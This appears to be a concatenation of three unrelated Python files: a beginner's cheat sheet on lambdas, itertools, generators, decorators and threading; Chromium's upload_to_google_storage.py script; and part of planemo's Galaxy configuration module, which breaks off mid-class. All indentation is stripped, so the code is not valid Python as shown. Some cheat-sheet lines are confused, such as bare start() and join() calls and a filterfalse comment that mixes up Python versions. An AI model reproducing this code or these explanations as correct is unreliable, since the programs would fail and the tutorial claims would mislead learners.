lambda arg1, arg2, ..., arg n: an expression using the arguments #general syntax
a = lambda x, y: x * y #defining a lambda function
a(20, 10) #result is 200; calling the lambda function
#Instead of...
def myfunc(list):
prod_list = []
for x in range(10):
for y in range(5):
product = x * y
prod_list.append(product)
return prod_list + list
#...we can use a lambda function, a list comprehension and concatenation on a single line of code
b = lambda list: [x * y for x in range(10) for y in range(5)] + list
#Map and Filter
#map() - takes a function and a sequence as arguments and applies the function to all the elements of the sequence; it returns a list in Python 2 and a lazy map object in Python 3
def product10(a):
return a * 10
list1 = range(10)
map(product10, list1) #applies the product10() function to each element of list1; the values are [0, 10, 20, 30, 40, 50, 60, 70, 80, 90]; in Python 3 wrap the call in list() to see them
#or...
map((lambda a: a * 10), list1) #same result, using a lambda function instead of a named function
#filter() - takes a function and a sequence as arguments and extracts all the elements in the list for which the function returns True
filter(lambda a: a > 5, list1) #the values are [6, 7, 8, 9]; in Python 3 wrap the call in list() to see them
#Iterators - an object which allows a programmer to traverse through all the elements of a collection
my_list = [1, 2, 3, 4, 5, 6, 7]
my_iter = iter(my_list) #iter() returns an interator object
next(my_iter) #in Python 2 and 3, it returns the elements of a sequence one by one; raises StopIteration when the sequence is exhausted
#Generators - special routines that can be used to control the iteration behavior of a loop; defined using the "def" keyword;
def my_gen(x, y): #creating a generator function
for i in range(x):
print("i is %d" % i)
print("y is %d" % y)
yield i * y #yields the values one at a time; traversing a sequence up to a certain point, getting the result and suspending the execution
my_object = my_gen(10, 5) #creating a generator object
next(my_object) #manually yield the next element returned by the my_gen() function; raises StopIteration when the sequence is exhausted
gen_exp = (x for x in range(5)) #creating a generator expression; similar to list comprehensions, but using parentheses instead of square brackets
next(gen_exp) #extracting each value in the list generated by range(5), one value at a time; raises StopIteration when the sequence is exhausted
#Itertools - built-in Python module for working with iterable data sets
from itertools import chain, count, cycle, filterfalse, islice #importing the itertools functions used below
list1 = [1, 2, 3, 'a', 'b', 'c']
list2 = [101, 102, 103, 'X', 'Y']
#chain() - takes several sequences and chains them together
chain(list1, list2)
list(chain(list1, list2)) #result is [1, 2, 3, 'a', 'b', 'c', 101, 102, 103, 'X', 'Y']
#count() - returns an iterator that generates consecutive integers until you stop it, otherwise it will go on forever
for i in count(10, 2.5):
if i <= 50:
print(i)
else:
break #result is printing the numbers between 10 and 50 inclusively, with a step of 2.5
#cycle() - returns an iterator that simply repeats the value given as argument infinitely; you have to find a way to break out of the infinite loop
a = range(11, 16)
for i in cycle(a):
print(i) #use Ctrl+C to break out of the infinite loop
#filterfalse() - returns the elements for which the function you give as argument returns False
list(filterfalse(lambda x: x < 5, [1, 2, 3, 4, 5, 6, 7])) #in Python 2 the result is [5, 6, 7]; in Python 3 there is no ifilter() like in Python 2, just filter() and filterfalse()
#islice() - performs slicing; we can specify a starting point of the slice, an end point and a step
list(islice(range(10), 2, 9, 2)) #result is [2, 4, 6, 8]
#Decorators - functions that take another function as a parameter and extend its functionality and behavior without modifying it
def my_decorator(target_function):
def function_wrapper():
return "Python is the " + target_function() + " programming language!"
return function_wrapper
@my_decorator
def target_function():
return "coolest"
target_function() #returns 'Python is the coolest programming language!'
#Threading
start() #simply starts or initiates the thread
join() #makes sure the program waits for all threads to terminate
th = threading.Thread(target = myfunction) #using the Thread class from the 'threading' module and telling it the target function to be executed using the 'target' argument
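#Added illustration (a small end-to-end sketch; myfunction is a made-up placeholder): running a function in a worker thread
import threading
def myfunction():
    print("Running in a worker thread")
th = threading.Thread(target=myfunction) #the 'target' argument tells the thread which function to execute
th.start() #starts the thread
th.join() #blocks until the thread terminates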
|
upload_to_google_storage.py
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Uploads files to Google Storage content addressed."""
import hashlib
import optparse
import os
import Queue
import re
import stat
import sys
import tarfile
import threading
import time
from download_from_google_storage import get_sha1
from download_from_google_storage import Gsutil
from download_from_google_storage import printer_worker
from download_from_google_storage import GSUTIL_DEFAULT_PATH
USAGE_STRING = """%prog [options] target [target2 ...].
Target is the file intended to be uploaded to Google Storage.
If target is "-", then a list of files will be taken from standard input
This script will generate a file (original filename).sha1 containing the
sha1 sum of the uploaded file.
It is recommended that the .sha1 file is checked into the repository,
the original file removed from the repository, and a hook added to the
DEPS file to call download_from_google_storage.py.
Example usages
--------------
Scan the current directory and upload all files larger than 1MB:
find . -name .svn -prune -o -size +1000k -type f -print0 | %prog -0 -b bkt -
(Replace "bkt" with the name of a writable bucket.)
"""
def get_md5(filename):
md5_calculator = hashlib.md5()
with open(filename, 'rb') as f:
while True:
chunk = f.read(1024*1024)
if not chunk:
break
md5_calculator.update(chunk)
return md5_calculator.hexdigest()
def get_md5_cached(filename):
"""Don't calculate the MD5 if we can find a .md5 file."""
# See if we can find an existing MD5 sum stored in a file.
if os.path.exists('%s.md5' % filename):
with open('%s.md5' % filename, 'rb') as f:
md5_match = re.search('([a-z0-9]{32})', f.read())
if md5_match:
return md5_match.group(1)
else:
md5_hash = get_md5(filename)
with open('%s.md5' % filename, 'wb') as f:
f.write(md5_hash)
return md5_hash
def _upload_worker(
thread_num, upload_queue, base_url, gsutil, md5_lock, force,
use_md5, stdout_queue, ret_codes, gzip):
while True:
filename, sha1_sum = upload_queue.get()
if not filename:
break
file_url = '%s/%s' % (base_url, sha1_sum)
if gsutil.check_call('ls', file_url)[0] == 0 and not force:
# File exists, check MD5 hash.
_, out, _ = gsutil.check_call_with_retries('ls', '-L', file_url)
etag_match = re.search('ETag:\s+([a-z0-9]{32})', out)
if etag_match:
remote_md5 = etag_match.group(1)
# Calculate the MD5 checksum to match it to Google Storage's ETag.
with md5_lock:
if use_md5:
local_md5 = get_md5_cached(filename)
else:
local_md5 = get_md5(filename)
if local_md5 == remote_md5:
stdout_queue.put(
'%d> File %s already exists and MD5 matches, upload skipped' %
(thread_num, filename))
continue
stdout_queue.put('%d> Uploading %s...' % (
thread_num, filename))
gsutil_args = ['cp']
if gzip:
gsutil_args.extend(['-z', gzip])
gsutil_args.extend([filename, file_url])
code, _, err = gsutil.check_call_with_retries(*gsutil_args)
if code != 0:
ret_codes.put(
(code,
'Encountered error on uploading %s to %s\n%s' %
(filename, file_url, err)))
continue
# Mark executable files with the header "x-goog-meta-executable: 1" which
# the download script will check for to preserve the executable bit.
if not sys.platform.startswith('win'):
if os.stat(filename).st_mode & stat.S_IEXEC:
code, _, err = gsutil.check_call_with_retries(
'setmeta', '-h', 'x-goog-meta-executable:1', file_url)
if not code:
ret_codes.put(
(code,
'Encountered error on setting metadata on %s\n%s' %
(file_url, err)))
def get_targets(args, parser, use_null_terminator):
if not args:
parser.error('Missing target.')
if len(args) == 1 and args[0] == '-':
# Take stdin as a newline or null separated list of files.
if use_null_terminator:
return sys.stdin.read().split('\0')
else:
return sys.stdin.read().splitlines()
else:
return args
def upload_to_google_storage(
input_filenames, base_url, gsutil, force,
use_md5, num_threads, skip_hashing, gzip):
# We only want one MD5 calculation happening at a time to avoid HD thrashing.
md5_lock = threading.Lock()
# Start up all the worker threads plus the printer thread.
all_threads = []
ret_codes = Queue.Queue()
ret_codes.put((0, None))
upload_queue = Queue.Queue()
upload_timer = time.time()
stdout_queue = Queue.Queue()
printer_thread = threading.Thread(target=printer_worker, args=[stdout_queue])
printer_thread.daemon = True
printer_thread.start()
for thread_num in range(num_threads):
t = threading.Thread(
target=_upload_worker,
args=[thread_num, upload_queue, base_url, gsutil, md5_lock,
force, use_md5, stdout_queue, ret_codes, gzip])
t.daemon = True
t.start()
all_threads.append(t)
# We want to hash everything in a single thread since it's faster.
# The bottleneck is in disk IO, not CPU.
hashing_start = time.time()
for filename in input_filenames:
if not os.path.exists(filename):
stdout_queue.put('Main> Error: %s not found, skipping.' % filename)
continue
if os.path.exists('%s.sha1' % filename) and skip_hashing:
stdout_queue.put(
'Main> Found hash for %s, sha1 calculation skipped.' % filename)
with open(filename + '.sha1', 'rb') as f:
sha1_file = f.read(1024)
if not re.match('^([a-z0-9]{40})$', sha1_file):
print >> sys.stderr, 'Invalid sha1 hash file %s.sha1' % filename
return 1
upload_queue.put((filename, sha1_file))
continue
stdout_queue.put('Main> Calculating hash for %s...' % filename)
sha1_sum = get_sha1(filename)
with open(filename + '.sha1', 'wb') as f:
f.write(sha1_sum)
stdout_queue.put('Main> Done calculating hash for %s.' % filename)
upload_queue.put((filename, sha1_sum))
hashing_duration = time.time() - hashing_start
# Wait for everything to finish.
for _ in all_threads:
upload_queue.put((None, None)) # To mark the end of the work queue.
for t in all_threads:
t.join()
stdout_queue.put(None)
printer_thread.join()
# Print timing information.
print 'Hashing %s files took %1f seconds' % (
len(input_filenames), hashing_duration)
print 'Uploading took %1f seconds' % (time.time() - upload_timer)
# See if we ran into any errors.
max_ret_code = 0
for ret_code, message in ret_codes.queue:
max_ret_code = max(ret_code, max_ret_code)
if message:
print >> sys.stderr, message
if not max_ret_code:
print 'Success!'
return max_ret_code
def create_archives(dirs):
archive_names = []
for name in dirs:
tarname = '%s.tar.gz' % name
with tarfile.open(tarname, 'w:gz') as tar:
tar.add(name)
archive_names.append(tarname)
return archive_names
def validate_archive_dirs(dirs):
# We don't allow .. in paths in our archives.
if any(map(lambda x: '..' in x, dirs)):
return False
# We only allow dirs.
if any(map(lambda x: not os.path.isdir(x), dirs)):
return False
# We don't allow sym links in our archives.
if any(map(os.path.islink, dirs)):
return False
# We require that the subdirectories we are archiving are all just below
# cwd.
return not any(map(lambda x: x not in next(os.walk('.'))[1], dirs))
def main():
parser = optparse.OptionParser(USAGE_STRING)
parser.add_option('-b', '--bucket',
help='Google Storage bucket to upload to.')
parser.add_option('-e', '--boto', help='Specify a custom boto file.')
parser.add_option('-a', '--archive', action='store_true',
help='Archive directory as a tar.gz file')
parser.add_option('-f', '--force', action='store_true',
help='Force upload even if remote file exists.')
parser.add_option('-g', '--gsutil_path', default=GSUTIL_DEFAULT_PATH,
help='Path to the gsutil script.')
parser.add_option('-m', '--use_md5', action='store_true',
help='Generate MD5 files when scanning, and don\'t check '
'the MD5 checksum if a .md5 file is found.')
parser.add_option('-t', '--num_threads', default=1, type='int',
help='Number of uploader threads to run.')
parser.add_option('-s', '--skip_hashing', action='store_true',
help='Skip hashing if .sha1 file exists.')
parser.add_option('-0', '--use_null_terminator', action='store_true',
help='Use \\0 instead of \\n when parsing '
'the file list from stdin. This is useful if the input '
'is coming from "find ... -print0".')
parser.add_option('-z', '--gzip', metavar='ext',
help='Gzip files which end in ext. '
'ext is a comma-separated list')
(options, args) = parser.parse_args()
# Enumerate our inputs.
input_filenames = get_targets(args, parser, options.use_null_terminator)
if options.archive:
if not validate_archive_dirs(input_filenames):
parser.error('Only directories just below cwd are valid entries when '
'using the --archive argument. Entries can not contain .. '
' and entries can not be symlinks. Entries were %s' %
input_filenames)
return 1
input_filenames = create_archives(input_filenames)
# Make sure we can find a working instance of gsutil.
if os.path.exists(GSUTIL_DEFAULT_PATH):
gsutil = Gsutil(GSUTIL_DEFAULT_PATH, boto_path=options.boto)
else:
gsutil = None
for path in os.environ["PATH"].split(os.pathsep):
if os.path.exists(path) and 'gsutil' in os.listdir(path):
gsutil = Gsutil(os.path.join(path, 'gsutil'), boto_path=options.boto)
if not gsutil:
parser.error('gsutil not found in %s, bad depot_tools checkout?' %
GSUTIL_DEFAULT_PATH)
base_url = 'gs://%s' % options.bucket
return upload_to_google_storage(
input_filenames, base_url, gsutil, options.force, options.use_md5,
options.num_threads, options.skip_hashing, options.gzip)
if __name__ == '__main__':
try:
sys.exit(main())
except KeyboardInterrupt:
sys.stderr.write('interrupted\n')
sys.exit(1)
|
config.py
|
"""Abstractions for setting up a Galaxy instance."""
from __future__ import absolute_import
from __future__ import print_function
import abc
import contextlib
import os
import random
import shutil
import threading
from string import Template
from tempfile import mkdtemp
from galaxy.containers.docker_model import DockerVolume
from galaxy.tool_util.deps import docker_util
from galaxy.util.commands import argv_to_str
from pkg_resources import parse_version
from six import (
add_metaclass,
iteritems
)
from six.moves import shlex_quote
from planemo import git
from planemo.config import OptionSource
from planemo.deps import ensure_dependency_resolvers_conf_configured
from planemo.docker import docker_host_args
from planemo.galaxy.workflows import remote_runnable_to_workflow_id
from planemo.io import (
communicate,
kill_pid_file,
shell,
shell_join,
untar_to,
wait_on,
warn,
write_file,
)
from planemo.mulled import build_involucro_context
from planemo.shed import tool_shed_url
from planemo.virtualenv import DEFAULT_PYTHON_VERSION
from .api import (
DEFAULT_ADMIN_API_KEY,
gi,
user_api_key,
)
from .distro_tools import (
DISTRO_TOOLS_ID_TO_PATH
)
from .run import (
setup_common_startup_args,
setup_venv,
)
from .workflows import (
find_tool_ids,
import_workflow,
install_shed_repos,
)
NO_TEST_DATA_MESSAGE = (
"planemo couldn't find a target test-data directory, you should likely "
"create a test-data directory or pass an explicit path using --test_data."
)
WEB_SERVER_CONFIG_TEMPLATE = """
[server:${server_name}]
use = egg:Paste#http
port = ${port}
host = ${host}
use_threadpool = True
threadpool_kill_thread_limit = 10800
[app:main]
paste.app_factory = galaxy.web.buildapp:app_factory
static_dir = static/
"""
TOOL_CONF_TEMPLATE = """<toolbox>
<tool file="data_source/upload.xml" />
${tool_definition}
</toolbox>
"""
SHED_TOOL_CONF_TEMPLATE = """<?xml version="1.0"?>
<toolbox tool_path="${shed_tool_path}">
</toolbox>
"""
SHED_DATA_MANAGER_CONF_TEMPLATE = """<?xml version="1.0"?>
<data_managers>
</data_managers>
"""
EMPTY_JOB_METRICS_TEMPLATE = """<?xml version="1.0"?>
<job_metrics>
</job_metrics>
"""
TOOL_SHEDS_CONF = """<tool_sheds>
<tool_shed name="Target Shed" url="${shed_target_url}" />
</tool_sheds>
"""
JOB_CONFIG_LOCAL = """<job_conf>
<plugins>
<plugin id="planemo_runner" type="runner" load="galaxy.jobs.runners.local:LocalJobRunner" workers="4"/>
</plugins>
<handlers>
<handler id="main"/>
</handlers>
<destinations default="planemo_dest">
<destination id="planemo_dest" runner="planemo_runner">
<param id="require_container">${require_container}</param>
<param id="docker_enabled">${docker_enable}</param>
<param id="docker_sudo">${docker_sudo}</param>
<param id="docker_sudo_cmd">${docker_sudo_cmd}</param>
<param id="docker_cmd">${docker_cmd}</param>
${docker_host_param}
</destination>
<destination id="upload_dest" runner="planemo_runner">
<param id="docker_enabled">false</param>
</destination>
</destinations>
<tools>
<tool id="upload1" destination="upload_dest" />
</tools>
</job_conf>
"""
LOGGING_TEMPLATE = """
## Configure Python loggers.
[loggers]
keys = root,paste,displayapperrors,galaxydeps,galaxymasterapikey,galaxy
[handlers]
keys = console
[formatters]
keys = generic
[logger_root]
level = WARN
handlers = console
[logger_paste]
level = WARN
handlers = console
qualname = paste
propagate = 0
[logger_galaxydeps]
level = DEBUG
handlers = console
qualname = galaxy.tools.deps
propagate = 0
[logger_galaxymasterapikey]
level = WARN
handlers = console
qualname = galaxy.web.framework.webapp
propagate = 0
[logger_displayapperrors]
level = ERROR
handlers =
qualname = galaxy.datatypes.display_applications.application
propagate = 0
[logger_galaxy]
level = ${log_level}
handlers = console
qualname = galaxy
propagate = 0
[handler_console]
class = StreamHandler
args = (sys.stderr,)
level = DEBUG
formatter = generic
[formatter_generic]
format = %(asctime)s %(levelname)-5.5s [%(name)s] %(message)s
"""
REFGENIE_CONFIG_TEMPLATE = """
config_version: 0.3
genome_folder: '%s'
genome_servers: ['http://refgenomes.databio.org']
genomes: null
"""
EMPTY_TOOL_CONF_TEMPLATE = """<toolbox></toolbox>"""
DEFAULT_GALAXY_BRANCH = "master"
DEFAULT_GALAXY_SOURCE = "https://github.com/galaxyproject/galaxy"
CWL_GALAXY_SOURCE = "https://github.com/common-workflow-language/galaxy"
DATABASE_LOCATION_TEMPLATE = "sqlite:///%s?isolation_level=IMMEDIATE"
COMMAND_STARTUP_COMMAND = './scripts/common_startup.sh ${COMMON_STARTUP_ARGS}'
CLEANUP_IGNORE_ERRORS = True
DEFAULT_GALAXY_BRAND = 'Configured by Planemo'
DEFAULT_TOOL_INSTALL_TIMEOUT = 60 * 60 * 1
UNINITIALIZED = object()
@contextlib.contextmanager
def galaxy_config(ctx, runnables, **kwds):
"""Set up a ``GalaxyConfig`` in an auto-cleaned context."""
c = local_galaxy_config
if kwds.get("dockerize", False):
c = docker_galaxy_config
elif kwds.get("external", False):
c = external_galaxy_config
log_thread = None
try:
with c(ctx, runnables, **kwds) as config:
if kwds.get('daemon'):
log_thread = threading.Thread(target=read_log, args=(ctx, config.log_file))
log_thread.daemon = True
log_thread.start()
yield config
finally:
if log_thread:
log_thread.join(1)
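# Hypothetical usage sketch (not part of planemo itself): shows how a caller might target
# an already-running Galaxy through the ``external`` code path instead of provisioning a
# local or Dockerized instance. ``ctx`` and ``runnables`` are assumed to come from
# planemo's CLI machinery; the URL and key below are placeholders for illustration only.
def _example_external_galaxy_config(ctx, runnables):
    with galaxy_config(ctx, runnables,
                       external=True,
                       galaxy_url="http://localhost:8080",
                       galaxy_user_key="<user-api-key>") as config:
        # ``config`` is a BaseGalaxyConfig wired to the remote instance.
        return config.version_major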
def read_log(ctx, log_path):
log_fh = None
e = threading.Event()
try:
while e:
if os.path.exists(log_path):
if not log_fh:
# Open in append so we start at the end of the log file
log_fh = open(log_path, 'a+')
log_lines = log_fh.read()
if log_lines:
ctx.log(log_lines)
e.wait(1)
finally:
if log_fh:
log_fh.close()
def simple_docker_volume(path):
path = os.path.abspath(path)
return DockerVolume("%s:%s:rw" % (path, path))
@contextlib.contextmanager
def docker_galaxy_config(ctx, runnables, for_tests=False, **kwds):
"""Set up a ``GalaxyConfig`` for Docker container."""
test_data_dir = _find_test_data(runnables, **kwds)
with _config_directory(ctx, **kwds) as config_directory:
def config_join(*args):
return os.path.join(config_directory, *args)
ensure_dependency_resolvers_conf_configured(ctx, kwds, os.path.join(config_directory, "resolvers_conf.xml"))
_handle_job_metrics(config_directory, kwds)
_handle_refgenie_config(config_directory, kwds)
shed_tool_conf = "config/shed_tool_conf.xml"
all_tool_paths = _all_tool_paths(runnables, **kwds)
tool_directories = set([]) # Things to mount...
for tool_path in all_tool_paths:
directory = os.path.dirname(os.path.normpath(tool_path))
if os.path.exists(directory):
tool_directories.add(directory)
# TODO: remap these.
tool_volumes = []
for tool_directory in tool_directories:
volume = simple_docker_volume(tool_directory)
tool_volumes.append(volume)
empty_tool_conf = config_join("empty_tool_conf.xml")
tool_conf = config_join("tool_conf.xml")
shed_tool_path = kwds.get("shed_tool_path") or config_join("shed_tools")
_ensure_directory(shed_tool_path)
sheds_config_path = _configure_sheds_config_file(
ctx, config_directory, **kwds
)
port = _get_port(kwds)
properties = _shared_galaxy_properties(config_directory, kwds, for_tests=for_tests)
_handle_container_resolution(ctx, kwds, properties)
master_api_key = _get_master_api_key(kwds)
template_args = dict(
shed_tool_path=shed_tool_path,
tool_conf=tool_conf,
)
tool_config_file = "%s,%s" % (tool_conf, shed_tool_conf)
_write_tool_conf(ctx, all_tool_paths, tool_conf)
write_file(empty_tool_conf, EMPTY_TOOL_CONF_TEMPLATE)
properties.update(dict(
tool_config_file=tool_config_file,
tool_sheds_config_file=sheds_config_path,
migrated_tools_config=empty_tool_conf,
))
server_name = "planemo%d" % random.randint(0, 100000)
# Value substitutions in Galaxy properties - for consistency with
# non-Dockerized version.
template_args = dict(
)
env = _build_env_for_galaxy(properties, template_args)
env["NONUSE"] = "nodejs,proftp,reports"
if ctx.verbose:
env["GALAXY_LOGGING"] = "full"
# TODO: setup FTP upload dir and disable FTP server in container.
_build_test_env(properties, env)
docker_target_kwds = docker_host_args(**kwds)
volumes = tool_volumes + [simple_docker_volume(config_directory)]
export_directory = kwds.get("export_directory", None)
if export_directory is not None:
volumes.append(DockerVolume("%s:/export:rw" % export_directory))
        # TODO: Allow these to be real Docker volumes and allow multiple.
extra_volume = kwds.get("docker_extra_volume")
if extra_volume:
volumes.append(simple_docker_volume(extra_volume))
yield DockerGalaxyConfig(
ctx,
config_directory,
env,
test_data_dir,
port,
server_name,
master_api_key,
runnables,
docker_target_kwds=docker_target_kwds,
volumes=volumes,
export_directory=export_directory,
kwds=kwds,
)
@contextlib.contextmanager
def local_galaxy_config(ctx, runnables, for_tests=False, **kwds):
"""Set up a ``GalaxyConfig`` in an auto-cleaned context."""
test_data_dir = _find_test_data(runnables, **kwds)
tool_data_table = _find_tool_data_table(
runnables,
test_data_dir=test_data_dir,
**kwds
)
data_manager_config_paths = [r.data_manager_conf_path for r in runnables if r.data_manager_conf_path]
galaxy_root = _find_galaxy_root(ctx, **kwds)
install_galaxy = kwds.get("install_galaxy", False)
if galaxy_root is not None:
if os.path.isdir(galaxy_root) and not os.listdir(galaxy_root):
os.rmdir(galaxy_root)
if os.path.isdir(galaxy_root) and install_galaxy:
raise Exception("%s is an existing non-empty directory, cannot install Galaxy again" % galaxy_root)
# Duplicate block in docker variant above.
if kwds.get("mulled_containers", False) and not kwds.get("docker", False):
if ctx.get_option_source("docker") != OptionSource.cli:
kwds["docker"] = True
else:
raise Exception("Specified no docker and mulled containers together.")
with _config_directory(ctx, **kwds) as config_directory:
def config_join(*args):
return os.path.join(config_directory, *args)
install_env = {}
if kwds.get('galaxy_skip_client_build', True):
install_env['GALAXY_SKIP_CLIENT_BUILD'] = '1'
if galaxy_root is None:
galaxy_root = config_join("galaxy-dev")
if not os.path.isdir(galaxy_root):
_build_eggs_cache(ctx, install_env, kwds)
_install_galaxy(ctx, galaxy_root, install_env, kwds)
if parse_version(kwds.get('galaxy_python_version') or DEFAULT_PYTHON_VERSION) >= parse_version('3'):
# on python 3 we use gunicorn,
# which requires 'main' as server name
server_name = 'main'
else:
server_name = "planemo%d" % random.randint(0, 100000)
# Once we don't have to support earlier than 18.01 - try putting these files
# somewhere better than with Galaxy.
log_file = "%s.log" % server_name
pid_file = "%s.pid" % server_name
ensure_dependency_resolvers_conf_configured(ctx, kwds, os.path.join(config_directory, "resolvers_conf.xml"))
_handle_job_config_file(config_directory, server_name, kwds)
_handle_job_metrics(config_directory, kwds)
_handle_refgenie_config(config_directory, kwds)
file_path = kwds.get("file_path") or config_join("files")
_ensure_directory(file_path)
tool_dependency_dir = kwds.get("tool_dependency_dir") or config_join("deps")
_ensure_directory(tool_dependency_dir)
shed_tool_conf = kwds.get("shed_tool_conf") or config_join("shed_tools_conf.xml")
all_tool_paths = _all_tool_paths(runnables, **kwds)
empty_tool_conf = config_join("empty_tool_conf.xml")
tool_conf = config_join("tool_conf.xml")
shed_data_manager_config_file = config_join("shed_data_manager_conf.xml")
shed_tool_path = kwds.get("shed_tool_path") or config_join("shed_tools")
_ensure_directory(shed_tool_path)
sheds_config_path = _configure_sheds_config_file(
ctx, config_directory, **kwds
)
database_location = config_join("galaxy.sqlite")
master_api_key = _get_master_api_key(kwds)
dependency_dir = os.path.join(config_directory, "deps")
_ensure_directory(shed_tool_path)
port = _get_port(kwds)
template_args = dict(
port=port,
host=kwds.get("host", "127.0.0.1"),
server_name=server_name,
temp_directory=config_directory,
shed_tool_path=shed_tool_path,
database_location=database_location,
tool_conf=tool_conf,
debug=kwds.get("debug", "true"),
id_secret=kwds.get("id_secret", "test_secret"),
log_level="DEBUG" if ctx.verbose else "INFO",
)
tool_config_file = "%s,%s" % (tool_conf, shed_tool_conf)
# Setup both galaxy_email and older test user test@bx.psu.edu
# as admins for command_line, etc...
properties = _shared_galaxy_properties(config_directory, kwds, for_tests=for_tests)
properties.update(dict(
server_name="main",
ftp_upload_dir_template="${ftp_upload_dir}",
ftp_upload_purge="False",
ftp_upload_dir=test_data_dir or os.path.abspath('.'),
ftp_upload_site="Test Data",
check_upload_content="False",
tool_dependency_dir=dependency_dir,
file_path=file_path,
new_file_path="${temp_directory}/tmp",
tool_config_file=tool_config_file,
tool_sheds_config_file=sheds_config_path,
manage_dependency_relationships="False",
job_working_directory="${temp_directory}/job_working_directory",
template_cache_path="${temp_directory}/compiled_templates",
citation_cache_type="file",
citation_cache_data_dir="${temp_directory}/citations/data",
citation_cache_lock_dir="${temp_directory}/citations/lock",
database_auto_migrate="True",
enable_beta_tool_formats="True",
id_secret="${id_secret}",
log_level="${log_level}",
debug="${debug}",
watch_tools="auto",
default_job_shell="/bin/bash", # For conda dependency resolution
tool_data_table_config_path=tool_data_table,
data_manager_config_file=",".join(data_manager_config_paths) or None, # without 'or None' may raise IOError in galaxy (see #946)
integrated_tool_panel_config=("${temp_directory}/"
"integrated_tool_panel_conf.xml"),
migrated_tools_config=empty_tool_conf,
test_data_dir=test_data_dir, # TODO: make gx respect this
shed_data_manager_config_file=shed_data_manager_config_file,
))
_handle_container_resolution(ctx, kwds, properties)
write_file(config_join("logging.ini"), _sub(LOGGING_TEMPLATE, template_args))
properties["database_connection"] = _database_connection(database_location, **kwds)
_handle_kwd_overrides(properties, kwds)
# TODO: consider following property
# watch_tool = False
# datatypes_config_file = config/datatypes_conf.xml
# welcome_url = /static/welcome.html
# logo_url = /
# sanitize_all_html = True
# serve_xss_vulnerable_mimetypes = False
# track_jobs_in_database = None
# outputs_to_working_directory = False
# retry_job_output_collection = 0
env = _build_env_for_galaxy(properties, template_args)
env.update(install_env)
_build_test_env(properties, env)
env['GALAXY_TEST_SHED_TOOL_CONF'] = shed_tool_conf
env['GALAXY_TEST_DBURI'] = properties["database_connection"]
env["GALAXY_TEST_UPLOAD_ASYNC"] = "false"
env["GALAXY_TEST_LOGGING_CONFIG"] = config_join("logging.ini")
env["GALAXY_DEVELOPMENT_ENVIRONMENT"] = "1"
# Following are needed in 18.01 to prevent Galaxy from changing log and pid.
# https://github.com/galaxyproject/planemo/issues/788
env["GALAXY_LOG"] = log_file
env["GALAXY_PID"] = pid_file
web_config = _sub(WEB_SERVER_CONFIG_TEMPLATE, template_args)
write_file(config_join("galaxy.ini"), web_config)
_write_tool_conf(ctx, all_tool_paths, tool_conf)
write_file(empty_tool_conf, EMPTY_TOOL_CONF_TEMPLATE)
shed_tool_conf_contents = _sub(SHED_TOOL_CONF_TEMPLATE, template_args)
# Write a new shed_tool_conf.xml if needed.
write_file(shed_tool_conf, shed_tool_conf_contents, force=False)
write_file(shed_data_manager_config_file, SHED_DATA_MANAGER_CONF_TEMPLATE)
yield LocalGalaxyConfig(
ctx,
config_directory,
env,
test_data_dir,
port,
server_name,
master_api_key,
runnables,
galaxy_root,
kwds,
)
def _all_tool_paths(runnables, **kwds):
tool_paths = [r.path for r in runnables if r.has_tools and not r.data_manager_conf_path]
all_tool_paths = list(tool_paths) + list(kwds.get("extra_tools", []))
for runnable in runnables:
if runnable.type.name == "galaxy_workflow":
tool_ids = find_tool_ids(runnable.path)
for tool_id in tool_ids:
tool_paths = DISTRO_TOOLS_ID_TO_PATH.get(tool_id)
if tool_paths:
if isinstance(tool_paths, str):
tool_paths = [tool_paths]
all_tool_paths.extend(tool_paths)
return all_tool_paths
def _shared_galaxy_properties(config_directory, kwds, for_tests):
"""Setup properties useful for local and Docker Galaxy instances.
Most things related to paths, etc... are very different between Galaxy
modalities and many taken care of internally to the container in that mode.
But this method sets up API stuff, tool, and job stuff that can be shared.
"""
master_api_key = _get_master_api_key(kwds)
user_email = _user_email(kwds)
properties = {
'master_api_key': master_api_key,
'admin_users': "%s,test@bx.psu.edu" % user_email,
'expose_dataset_path': "True",
'cleanup_job': 'never',
'collect_outputs_from': "job_working_directory",
'allow_path_paste': "True",
'check_migrate_tools': "False",
'use_cached_dependency_manager': str(kwds.get("conda_auto_install", False)),
'brand': kwds.get("galaxy_brand", DEFAULT_GALAXY_BRAND),
'strict_cwl_validation': str(not kwds.get("non_strict_cwl", False)),
}
if kwds.get("galaxy_single_user", True):
properties['single_user'] = user_email
if for_tests:
empty_dir = os.path.join(config_directory, "empty")
_ensure_directory(empty_dir)
properties["tour_config_dir"] = empty_dir
properties["interactive_environment_plugins_directory"] = empty_dir
properties["visualization_plugins_directory"] = empty_dir
properties["refgenie_config_file"] = kwds.get('refgenie_config_file', '')
return properties
@contextlib.contextmanager
def external_galaxy_config(ctx, runnables, for_tests=False, **kwds):
yield BaseGalaxyConfig(
ctx=ctx,
galaxy_url=kwds.get("galaxy_url", None),
master_api_key=_get_master_api_key(kwds),
user_api_key=kwds.get("galaxy_user_key", None),
runnables=runnables,
kwds=kwds
)
def _get_master_api_key(kwds):
master_api_key = kwds.get("galaxy_admin_key") or DEFAULT_ADMIN_API_KEY
return master_api_key
def _get_port(kwds):
port = int(kwds.get("port", 9090))
return port
def _user_email(kwds):
user_email = kwds.get("galaxy_email")
return user_email
@contextlib.contextmanager
def _config_directory(ctx, **kwds):
config_directory = kwds.get("config_directory", None)
created_config_directory = False
if not config_directory:
created_config_directory = True
config_directory = os.path.realpath(mkdtemp())
ctx.vlog("Created directory for Galaxy configuration [%s]" % config_directory)
try:
yield config_directory
finally:
cleanup = not kwds.get("no_cleanup", False)
if created_config_directory and cleanup:
shutil.rmtree(config_directory)
@add_metaclass(abc.ABCMeta)
class GalaxyInterface(object):
"""Abstraction around a Galaxy instance.
Description of a Galaxy instance and how to interact with it - this could
potentially be a remote, already running instance or an instance Planemo manages
to execute some task(s).
"""
@abc.abstractproperty
def gi(self):
"""Return an admin bioblend Galaxy instance for API interactions."""
@abc.abstractproperty
def user_gi(self):
"""Return a user-backed bioblend Galaxy instance for API interactions."""
@abc.abstractmethod
def install_repo(self, *args, **kwds):
"""Install specified tool shed repository."""
@abc.abstractproperty
def tool_shed_client(self):
"""Return a admin bioblend tool shed client."""
@abc.abstractmethod
def wait_for_all_installed(self):
"""Wait for all queued up repositories installs to complete."""
@abc.abstractmethod
def install_workflows(self):
"""Install all workflows configured with these planemo arguments."""
@abc.abstractmethod
def workflow_id(self, path):
"""Get installed workflow API ID for input path."""
@abc.abstractproperty
def version_major(self):
